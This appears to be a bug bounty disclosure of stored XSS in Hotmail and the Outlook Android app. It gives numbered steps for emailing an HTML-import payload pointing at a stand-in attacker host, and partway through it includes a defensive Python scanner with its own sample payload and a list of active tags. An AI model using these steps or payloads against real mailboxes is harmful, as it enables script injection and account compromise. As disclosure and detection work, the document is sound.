Steps To Reproduce :
1. Go to https://emkei.cz/ (I use this site to send messages because it allows me to send messages with Content-Type "text/html").
2. Enter anything in the From E-Name, From E-mail and Subject fields.
3. Enter your test Hotmail address in the To field.
4. Select text/html under Content-Type.
5. Put ( <link rel=import href=https://Evilcom/filepayload> ) in the Text field and submit.
6. Sign in to your test Hotmail account.
7. Click on the message and the payload will be executed.
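A receiving-side check for the kind of message these steps produce, as an added example that is not part of the original write-up: it walks the text/html parts of a mail and reports HTML imports and other active content that a sanitizer should have stripped before rendering. The function and class names, the sample message and the attacker.example host are constructed for illustration.

```python
from email import message_from_string
from email.policy import default
from html.parser import HTMLParser

# Tags that load or run active content; a mail renderer should not pass them through.
ACTIVE_TAGS = {"script", "iframe", "object", "embed"}


class ActiveContentFinder(HTMLParser):
    """Collects (kind, detail) tuples for markup a mail sanitizer must remove."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases names and accepts unquoted attribute values.
        attrs = {name: (value or "") for name, value in attrs}
        rel_tokens = attrs.get("rel", "").lower().split()
        if tag == "link" and "import" in rel_tokens:
            self.findings.append(("html-import", attrs.get("href", "")))
        elif tag in ACTIVE_TAGS:
            self.findings.append((tag, attrs.get("src", "")))
        for name in attrs:
            if name.startswith("on"):  # inline event handlers
                self.findings.append(("event-handler", f"{tag}[{name}]"))


def scan_message(raw):
    """Return findings for every text/html part of an RFC 5322 message string."""
    finder = ActiveContentFinder()
    for part in message_from_string(raw, policy=default).walk():
        if part.get_content_type() == "text/html":
            finder.feed(part.get_content())
    return finder.findings


# Constructed sample: same shape as the message in the steps, placeholder host.
SAMPLE = (
    "From: sender@example.com\nTo: test@example.com\nSubject: test\n"
    'MIME-Version: 1.0\nContent-Type: text/html; charset="utf-8"\n\n'
    "<p>hello</p><link rel=import href=https://attacker.example/payload>\n"
)
BENIGN = SAMPLE.replace("<link rel=import href=https://attacker.example/payload>", "<b>hi</b>")

if __name__ == "__main__":
    print(scan_message(SAMPLE))
```

A non-empty result on an already-sanitized body means the filter let active content through; the durable fix is an allowlist of tags and attributes applied before rendering, not a blocklist like the one used here for detection.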
Proof Of Concept :
Bug 2 : XSS Stored In com.microsoft.office.outlook
After they fixed the first bug, I downloaded their Android application [ com.microsoft.office.outlook ] and tried to send a message containing a simple XSS payload the same way as the first time. The surprising thing is that the message is not filtered at all, and all HTML tags are printed without filtering.